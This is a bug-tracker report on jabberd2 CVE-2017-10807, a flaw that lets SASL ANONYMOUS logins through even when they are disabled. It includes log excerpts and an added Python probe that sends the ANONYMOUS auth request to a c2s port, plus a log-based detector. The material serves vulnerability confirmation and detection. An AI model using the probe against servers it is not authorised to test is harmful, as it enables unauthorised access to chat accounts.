jabberd2 before 2.6.1 allows anyone to authenticate using SASL ANONYMOUS, even when the sasl.anonymous c2s.xml option is not enabled
Affects | Status | Importance | Assigned to | Milestone
---|---|---|---|---
Jabberd | Incomplete | Undecided | Unassigned |
Debian | Fix Released | Unknown | |
jabberd2 (Ubuntu) | Fix Released | Undecided | Unassigned |
Trusty | New | Undecided | Unassigned |
Xenial | New | Undecided | Unassigned |
Bug Description
Xenial 16.04.3 LTS ships with jabberd2 version 2.3.4-1ubuntu2 (as of this report). This version is vulnerable to CVE-2017-10807, namely it allows "anonymous" SASL authentication even when that option is switched off in the configuration:
```
Feb 06 13:34:24 dehost jabberd/c2s[2662]: [68] ANONYMOUS authentication succeeded: <email address hidden> ::ffff:
Feb 06 13:34:29 dehost jabberd/c2s[2662]: [69] ANONYMOUS authentication succeeded: <email address hidden> ::ffff:
Feb 06 13:34:30 dehost jabberd/c2s[2662]: [76] ANONYMOUS authentication succeeded: <email address hidden> ::ffff:
Feb 06 13:34:35 dehost jabberd/c2s[2662]: [71] ANONYMOUS authentication succeeded: <email address hidden> ::ffff:
```
There is Debian bug #867032 for this vulnerability.
Current upstream versions of jabberd2 are not vulnerable; in particular version 2.6.1-1 that ships with artful is _probably_ not vulnerable, so this report only applies to the LTS release.
Apparently fixed by this upstream commit: https:/
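The report above shows the symptom in the c2s log but not how to confirm it on a live host. Below is an added probe and log check (not code from the report, from jabberd2 or from Ubuntu). It opens a plaintext c2s stream on port 5222, records which SASL mechanisms the server advertises, then sends `<auth mechanism='ANONYMOUS'/>` regardless of whether ANONYMOUS was advertised, because the bug is precisely that the server accepts a mechanism the configuration turned off. A second part scans c2s log lines for "ANONYMOUS authentication succeeded" and raises an alert when the administrator believes anonymous auth is disabled. Host names, the port, and the sample log lines are constructed assumptions; the probe does not negotiate STARTTLS and reports that case instead of continuing.

```python
"""Probe and log check for the jabberd2 SASL ANONYMOUS bypass (CVE-2017-10807).

Added example, not jabberd2 project code.  Hosts, ports and sample log
lines are constructed for illustration.
"""
import re
import socket

SASL_NS = "urn:ietf:params:xml:ns:xmpp-sasl"
STREAM_NS = "http://etherx.jabber.org/streams"


def stream_header(domain):
    """Client-to-server stream open (RFC 6120), the first bytes sent on 5222."""
    return ("<?xml version='1.0'?>"
            "<stream:stream to='%s' xmlns='jabber:client' "
            "xmlns:stream='%s' version='1.0'>" % (domain, STREAM_NS))


def anonymous_auth():
    """SASL ANONYMOUS carries no credentials: this element is the whole request."""
    return "<auth xmlns='%s' mechanism='ANONYMOUS'/>" % SASL_NS


def offered_mechanisms(features_xml):
    """Mechanisms the server advertises inside <stream:features/>."""
    return re.findall(r"<mechanism>([^<]+)</mechanism>", features_xml)


def starttls_required(features_xml):
    """True when the server demands TLS before SASL (this probe stops there)."""
    return bool(re.search(r"<starttls[^>]*>\s*<required/>", features_xml))


def classify_auth_reply(reply_xml):
    """'accepted' for <success/>, 'rejected' for <failure/>, else 'unknown'."""
    if "<success" in reply_xml:
        return "accepted"
    if "<failure" in reply_xml:
        return "rejected"
    return "unknown"


def _recv(sock, timeout=5.0):
    """Read until the end of the features block or a SASL reply (or timeout)."""
    sock.settimeout(timeout)
    buf = b""
    try:
        while True:
            data = sock.recv(4096)
            if not data:
                break
            buf += data
            if (b"</stream:features>" in buf or b"<success" in buf
                    or b"<failure" in buf):
                break
    except socket.timeout:
        pass
    return buf.decode("utf-8", "replace")


def probe(host, domain=None, port=5222):
    """Try ANONYMOUS against a c2s port.  'accepted' on a server whose
    sasl.anonymous option is off means the server is affected."""
    domain = domain or host
    with socket.create_connection((host, port), timeout=5) as sock:
        sock.sendall(stream_header(domain).encode())
        features = _recv(sock)
        if starttls_required(features):
            return {"mechanisms": [], "result": "starttls-required"}
        mechs = offered_mechanisms(features)
        # Send ANONYMOUS even if it was not advertised: that is the bug.
        sock.sendall(anonymous_auth().encode())
        result = classify_auth_reply(_recv(sock))
        sock.sendall(b"</stream:stream>")
    return {"mechanisms": mechs, "result": result}


# Matches the c2s log format shown in the report.
LOG_RE = re.compile(r"jabberd/c2s\[(?P<pid>\d+)\]: \[(?P<fd>\d+)\] "
                    r"ANONYMOUS authentication succeeded: (?P<who>.*)$")


def anonymous_logins(lines):
    """Every c2s log line that records a successful ANONYMOUS login."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if m:
            hits.append({"pid": m.group("pid"), "fd": m.group("fd"),
                         "who": m.group("who").strip()})
    return hits


def should_alert(lines, anonymous_enabled):
    """An ANONYMOUS success while c2s.xml has anonymous disabled is either
    CVE-2017-10807 or a configuration that is not what you think it is."""
    return (not anonymous_enabled) and bool(anonymous_logins(lines))


# Constructed sample modelled on the report's lines; not from a real host.
SAMPLE_LOG = [
    "Feb 06 13:34:24 dehost jabberd/c2s[2662]: [68] ANONYMOUS authentication "
    "succeeded: anon@dehost ::ffff:192.0.2.10",
    "Feb 06 13:34:26 dehost jabberd/c2s[2662]: [70] DIGEST-MD5 authentication "
    "succeeded: alice@dehost ::ffff:192.0.2.11",
    "Feb 06 13:34:29 dehost jabberd/c2s[2662]: [69] ANONYMOUS authentication "
    "succeeded: anon@dehost ::ffff:192.0.2.12",
]

if __name__ == "__main__":
    import sys
    print(probe(sys.argv[1]))
    print("alert:", should_alert(SAMPLE_LOG, anonymous_enabled=False))
```

Run `python3 probe.py jabber.example.org` (hypothetical host) against a server whose sasl.anonymous option is off: a result of `accepted` confirms the bypass, while `rejected` with ANONYMOUS absent from `mechanisms` is the expected behaviour of a fixed build. The log check is the detection side of the same issue and can be pointed at journal output from `jabberd/c2s`.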
CVE References
CVE-2017-10807
information type: Private Security → Public Security
description: updated
Changed in debian:
status: Unknown → Fix Released
Thanks for taking the time to report this bug and helping to make Ubuntu better. Since the package referred to in this bug is in universe or multiverse, it is community maintained. If you are able, I suggest coordinating with upstream and posting a debdiff for this issue. When a debdiff is available, members of the security team will review it and publish the package. See the following link for more information: https://wiki.ubuntu.com/SecurityTeam/UpdateProcedures